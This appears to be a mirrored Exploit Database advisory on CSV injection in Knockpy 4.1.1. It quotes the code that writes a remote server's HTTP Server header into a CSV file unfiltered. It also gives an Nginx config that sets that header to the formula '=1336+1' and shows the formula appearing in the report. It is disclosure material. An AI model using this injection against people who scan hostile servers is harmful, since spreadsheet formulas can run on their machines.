Knockpy 4.1.1 – CSV Injection

• Exploit Database
• 108 阅读

• 作者： Dolev Farhi
  日期： 2021-01-04
• 类别：

  • local
  平台：

  • Python
• 来源：https://www.exploit-db.com/exploits/49342/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56

  # Exploit Title: Knockpy 4.1.1 - CSV Injection # Author: Dolev Farhi # Date: 2020-12-29 # Vendor Homepage: https://github.com/guelfoweb/knock # Version : 4.1.1 # Tested on: Debian 9.13   Knockpy, as part of its subdomain brute forcing flow of a remote domain, issues a HEAD request to the server to fetch details such as headers, status code, etc. The data then gets reflected when issuing the -c flag to store as a CSV file with the Server HTTP Response Header unfiltered.   Vulnerable code segment(s)   # knockpy.py   # row = ip+'\t'+str(data['status'])+'\t'+'host'+'\t'+str(data['hostname'])+get_tab(data['hostname'])+str(server_type) # subdomain_csv_list.append(ip+','+str(data['status'])+','+'host'+','+str(data['hostname'])+','+str(server_type))   # modules/save_report.py   # if fields: #csv_report += 'ip,status,type,domain_name,server\n' # for item in report: #csv_report += item + '\n' # report = csv_report     1. Example malicious Nginx config to return CSV formula headers:   http { ... server_tokens off; more_set_headers 'Server: =1336+1'; ... }   2. Tester runs Knoockpy root@host:~/# python knockpy/knockpy.py -c test.local   + checking for virustotal subdomains: SKIP VirusTotal API_KEY not found + checking for wildcard: NO + checking for zonetransfer: NO + resolving target: YES - scanning for subdomain...   Ip Address Status Type Domain Name Server ---------- ------ ---- ----------- ------ 127.0.0.1 200 hostappserver.test.local =1336+1     CSV result   root@host:~/# cat test_local.csv 127.0.0.1,200,host,appserver.test.local,=1336+1 127.0.0.1,200,host,www.test.local,=1336+1